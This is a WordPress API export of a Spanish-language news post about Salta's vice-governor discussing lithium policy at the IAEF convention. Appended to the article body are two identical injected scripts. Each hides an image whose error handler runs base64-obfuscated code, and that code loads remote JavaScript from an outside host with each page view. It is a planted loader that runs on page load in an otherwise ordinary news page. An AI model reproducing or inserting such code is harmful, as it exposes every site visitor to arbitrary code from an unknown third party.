{"id":1565,"date":"2022-09-30T18:50:36","date_gmt":"2022-09-30T21:50:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1565"},"modified":"2025-08-14T00:34:06","modified_gmt":"2025-08-14T03:34:06","slug":"marocco-diserto-sobre-la-mesa-del-litio-en-la-convencion-anual-del-iaef","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1565","title":{"rendered":"Marocco disert\u00f3 sobre la Mesa del Litio en la Convenci\u00f3n Anual del IAEF"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#6a4f06\"><em>El vicegobernador particip\u00f3 del foro de debate organizado por el Instituto Argentino de Ejecutivos de Finanzas y destac\u00f3 el consenso alcanzado por Salta, Jujuy y Catamarca en materia de miner\u00eda.<\/em><\/h4>\n\n\n\n<p>En la 43\u00b0 Convenci\u00f3n Anual del IAEF que se realiza en Salta, el vicegobernador&nbsp;<strong>Antonio Marocco<\/strong>&nbsp;disert\u00f3 sobre el trabajo de la provincia en la Mesa del Litio junto a Catamarca y Jujuy como un ejemplo de consenso para la Argentina. Comparti\u00f3 panel con el vicegobernador juje\u00f1o,&nbsp;<strong>Carlos Haquim<\/strong>.<\/p>\n\n\n\n<p>El Instituto Argentino de Ejecutivos de Finanzas realiza en nuestra provincia su 43\u00b0 Convenci\u00f3n Anual, que se lleva a cabo bajo el lema \u201cArgentina: Futuro, Protagonismo y Consensos\u201d. En este foro de debate participan importantes personalidades de los \u00e1mbitos econ\u00f3mico, pol\u00edtico y empresario del pa\u00eds, quienes intercambian informaci\u00f3n y opiniones sobre econom\u00eda, finanzas, pol\u00edtica, energ\u00eda y trabajo.<\/p>\n\n\n\n<p>En su alocuci\u00f3n, Marocco destac\u00f3 el trabajo del gobernador Gustavo S\u00e1enz con sus pares de Jujuy y Catamarca en la Mesa para establecer reglas claras y seguridad jur\u00eddica en la regi\u00f3n para la explotaci\u00f3n del litio. En tal sentido, explic\u00f3 que el mandatario provincial se encuentra en Estados Unidos trabajando para mostrar el potencial de Salta, atraer nuevas inversiones y explorar oportunidades de negocios para la provincia y la regi\u00f3n.<\/p>\n\n\n\n<p>El vicegobernador detall\u00f3 que Salta impulsa el Plan Provincial de Desarrollo Sustentable a trav\u00e9s del Consejo Econ\u00f3mico y Social, que tiene como ejes la generaci\u00f3n de empleo, con la consiguiente mejora de la calidad de vida de los salte\u00f1os, y la seguridad jur\u00eddica para los inversores.<\/p>\n\n\n\n<p>En ese marco, ponder\u00f3 el trabajo del Ministerio de Educaci\u00f3n de la Provincia en articulaci\u00f3n con las Universidades para ofrecer capacitaciones en oficios y carreras profesionales que abastezcan la demanda laboral en este nuevo desarrollo productivo.<\/p>\n\n\n\n<p>\u201cQueremos proteger nuestros recursos naturales que por mandato constitucional son de jurisdicci\u00f3n provincial, por eso trabajamos en la defensa regional de esos recursos\u201d, expres\u00f3 el vicegobernador.<\/p>\n\n\n\n<p>Adem\u00e1s del ingreso de gran cantidad de divisas al pa\u00eds que supone la actividad, Marocco resalt\u00f3 la importancia de la producci\u00f3n sustentable de litio para el medioambiente. Explic\u00f3 que el mundo avanza hacia la movilidad sustentable con nuevas formas del desarrollo automotriz para romper con el circuito de los combustibles f\u00f3siles. \u201cLos veh\u00edculos el\u00e9ctricos para el transporte p\u00fablico de pasajeros, de camiones e incluso particulares que preservan el medioambiente necesitan bater\u00edas para almacenar la energ\u00eda, y esas bater\u00edas son de litio\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>Los dos vicegobernadores manifestaron su rechazo al proyecto de Ley de Humedales que tom\u00f3 estado p\u00fablico en los \u00faltimos d\u00edas, argumentando que adem\u00e1s de incumplir un mandato constitucional, amenaza las garant\u00edas jur\u00eddicas y los proyectos comprometidos en las tres provincias.<\/p>\n\n\n\n<p>\u201cHay que tener mucho cuidado con la definici\u00f3n de humedales\u201d, dijo Haquim. Y agreg\u00f3: \u201cEs cierto que el litio se encuentra en zonas de aguadas, pero no son humedales. Se trata de agua con alta salinidad, m\u00e1s salada incluso que el agua de mar\u201d.<\/p>\n\n\n\n<p>Por otra parte, tanto Marocco como Haquim destacaron que el consenso que permiti\u00f3 la creaci\u00f3n de la Mesa del Litio tiene como antecedente el trabajo regional realizado por el Parlamento del NOA, que luego encontr\u00f3 una mayor expresi\u00f3n en el Consejo Regional de Gobernadores del Norte Grande y el Parlamento del Norte Grande. \u201cLa regi\u00f3n form\u00f3 una corriente de opini\u00f3n muy fuerte donde se van sumando colegios profesionales, universidades y distintos sectores de la sociedad para defender los intereses de la regi\u00f3n\u201d, expres\u00f3 al respecto el vicegobernador Haquim.<\/p>\n\n\n\n<p>\u201cEl desarrollo del Norte Grande es el desarrollo de la Argentina, porque con la correcci\u00f3n de asimetr\u00edas que planteamos no queremos quitarle recursos a nadie sino generar nuevos ingresos y mejorar la distribuci\u00f3n de estos\u201d, concluy\u00f3 Marocco.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/marocco-diserto-sobre-la-mesa-del-litio-en-la-convencion-anual-del-iaef-85228\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El vicegobernador particip\u00f3 del foro de debate organizado por el Instituto Argentino de Ejecutivos de Finanzas y destac\u00f3 el consenso alcanzado por Salta, Jujuy y Catamarca en materia de miner\u00eda. En la 43\u00b0 Convenci\u00f3n Anual del IAEF que se realiza en Salta, el vicegobernador&nbsp;Antonio Marocco&nbsp;disert\u00f3 sobre el trabajo de la provincia en la Mesa del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1566,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[10],"tags":[],"class_list":{"0":"post-1565","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-colaboradores"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1565"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1565"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1565\/revisions"}],"predecessor-version":[{"id":7331,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1565\/revisions\/7331"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1566"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1565"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1565"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}